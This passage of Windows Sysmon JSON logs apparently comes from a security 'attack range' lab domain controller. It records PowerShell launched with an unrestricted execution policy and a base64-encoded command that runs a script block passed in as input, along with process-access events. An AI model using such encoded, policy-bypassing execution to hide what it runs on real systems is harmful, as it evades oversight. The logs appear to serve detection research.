AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-0312-5F25-0000-0020C4B40600}\r\nLogonId: 0x6B4C4\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {A837DB8D-0312-5F25-0000-0010BAB70600}\r\nParentProcessId: 1988\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.477","ProcessGuid":"{A837DB8D-0312-5F25-0000-001089B80600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-0312-5F25-0000-0020C4B40600}","LogonId":"0x6b4c4","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{A837DB8D-0312-5F25-0000-0010BAB70600}","ParentProcessId":"1988","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4507,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.467\r\nSourceProcessGUID: {A837DB8D-0312-5F25-0000-0010BAB70600}\r\nSourceProcessId: 1988\r\nSourceThreadId: 2576\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {A837DB8D-0312-5F25-0000-001089B80600}\r\nTargetProcessId: 3904\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.467","SourceProcessGUID":"{A837DB8D-0312-5F25-0000-0010BAB70600}","SourceProcessId":"1988","SourceThreadId":"2576","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{A837DB8D-0312-5F25-0000-001089B80600}","TargetProcessId":"3904","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4508,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.467\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0312-5F25-0000-001089B80600}\r\nTargetProcessId: 3904\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.467","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0312-5F25-0000-001089B80600}","TargetProcessId":"3904","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4509,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.467\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.467","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4510,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.467\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 